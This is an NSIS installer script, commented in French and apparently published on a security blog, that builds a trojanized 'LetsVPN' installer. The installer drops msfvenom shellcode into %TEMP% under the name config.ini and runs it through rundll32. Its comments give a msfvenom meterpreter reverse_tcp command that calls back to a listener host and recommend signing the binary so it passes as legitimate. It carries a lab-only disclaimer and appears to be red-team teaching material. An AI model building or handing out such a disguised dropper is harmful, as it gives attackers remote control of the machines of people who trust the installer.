; catena.nsi - Trojanized LetsVPN Installer ; Simule un installateur légitime mais exécute un shellcode malveillant ; À utiliser UNIQUEMENT dans un lab sécurisé (article 323-1 CP) ; Par Platon-Y pour PCtamalou.fr ; Nom et fichier de sortie Name "LetsVPN" OutFile "letsVPN.exe" ; Répertoire d'installation InstallDir "$PROGRAMFILES\LetsVPN" ; Section principale Section ; Définit le répertoire de sortie SetOutPath $INSTDIR ; Copie le shellcode (généré par msfvenom) File /tmp/shellcode.bin ; Copie le shellcode dans %TEMP% sous le nom config.ini ExecWait 'cmd.exe /c copy $INSTDIR\shellcode.bin %TEMP%\config.ini' ; Exécute le shellcode via rundll32 ; Simule l'exécution d'un payload malveillant ExecWait 'rundll32.exe %TEMP%\config.ini, #1' SectionEnd ; Instructions d'utilisation ; 1. Génère shellcode.bin avec msfvenom : ; msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 -f raw -o /tmp/shellcode.bin ; 2. Compile avec : makensis catena.nsi ; 3. Signe avec OpenSSL/osslsigncode pour simuler un certificat légitime ; 4. Transfère et exécute dans ton lab sécurisé